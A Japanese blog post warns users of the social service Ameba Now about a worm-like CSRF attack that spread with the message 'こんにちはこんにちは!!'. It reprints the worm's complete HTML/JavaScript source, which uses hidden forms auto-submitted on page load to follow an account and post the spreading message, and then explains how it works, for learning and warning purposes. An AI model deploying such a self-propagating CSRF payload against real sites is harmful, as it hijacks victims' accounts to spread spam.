「Ameba(アメーバ)なう」でこんにちは!祭
1年以上前の記事です。内容が古い可能性があります。
先日、パソコン版が使えるようになったばかりの「Amebaなう」でこんにちは!!ワーム(のようなもの)が発生しているそうだ。
□【緊急】アメーバなう利用中の皆さんへ【ご注意!】|ぼくはまちちゃん!(アメーバ)
お友達の書き込みに「こんにちはこんにちは!!」というものがあったら 絶対にクリックしないでください!!!!
アメーバにアクセスしている状態でこちらのリンクを踏むと感染?する。
□アメーバなうでこんにちは! (←今は動かないようですが念のため踏まないでください)
ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)
販売元:アイ・ディ・ジー・ジャパン
発売日:2008-07-16
レビューを見る
クロスサイトスクリプティングに似たクロスサイトリクエストフォージェリ(CSRF)といった技術を使ったワームのようなものらしい。
□@IT:「ぼくはまちちゃん」 ――知られざるCSRF攻撃
ちなみにソースはHTMLとJavascriptだけという簡単なもの。
勉強になるので公開しちゃう。いいですよね、製作者さん。
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>アメーバなうでこんにちは!</title>
</head>
<body onload="document.getElementById('f1').submit();document.getElementById('f2').submit()">
<form action="http://now.ameba.jp/api/follow" method="post" id="f1" target="ifr1">
<input type="text" name="followAmebaId" value="主のID">
</form>
<form action="http://ucsnow.ameba.jp/post" method="post" id="f2" target="ifr2">
<input type="text" name="entryText" value="こんにちはこんにちは!! http://bit.ly/7RIjd8">
<input type="text" name="replyEntryId" value="0000">
</form>
<iframe name="ifr1"></iframe>
<iframe name="ifr2"></iframe>
</body>
</html>
このページを開くとonloadで書かれたスクリプトが実行される。
スクリプトにはフォームのサブミット(送信)ボタンを押せと書かれている。
で、そのフォームが「Amebaなう」に上記サイトのリンクを入れた定型文を書き込むフォームと、主さん?をフォローするフォームになっている。
ちなみにiframeはその結果を表示させるためにある。
(followAmebaIdとreplyEntryIdは書き換えました)
まあ、単純に「Amebaなう」内だけではなく、外部からも書き込みやフォローができるようになっていたということだと思う。
とりあえず現在は閉めちゃったみたいで動いていないみたい。
主さんのAmebaなうアカウントも消されちゃったみたいですし。。
一部ではAmebaのマーケティング手法の一つだろうと言っている人もいますが果たして。。
■Amebaなう(アメーバなう)
□のりささんの投稿したなう | Amebaなう(アメーバなう)
※ この記事は前日の深夜書いたものでして、現在上記「アメーバなうでこんにちは!」のサイトは全く危険性の無いサイトに入れ替わっています。(公開時追記)
※ ブコメで指摘受けたのでワーム(のようなもの)に表記を変えました。ちなみにワームとは (さらに追記)
アドセンス広告メイン
関連記事
-
-
ビジュアル重視の印刷会社
1年以上前の記事です。内容が古い可能性があります。薄利多売の印刷業界では、 お客 …
-
-
スパムの罰金3000万円が施行
1年以上前の記事です。内容が古い可能性があります。かつてネタにした「スパムの代償 …
-
-
土日も大切
1年以上前の記事です。内容が古い可能性があります。当ブログ、土日になるとアクセス …
-
-
徹夜明け
1年以上前の記事です。内容が古い可能性があります。月曜から徹夜明け。。 ビデオの …
-
-
土曜出社
1年以上前の記事です。内容が古い可能性があります。うちの会社は月に何度か土曜出社 …
-
-
引っ越し後チーム詳細
1年以上前の記事です。内容が古い可能性があります。が、決まりつつある。 会社の人 …
-
-
「いいね!」を促すFacebookアプリはやっぱりやめといたほうがいい
1年以上前の記事です。内容が古い可能性があります。間違った使い方をしなければFa …
-
-
目指せ内閣総理大臣!! 藤川ゆり議員のDVDが大人気
1年以上前の記事です。内容が古い可能性があります。以前このブログでも紹介させてい …
-
-
会社バレしたら実名・顔出しします
1年以上前の記事です。内容が古い可能性があります。今まで何度も議論されてきている …
-
-
あけましておめでとうございます
1年以上前の記事です。内容が古い可能性があります。新年最初のブログは大晦日から新 …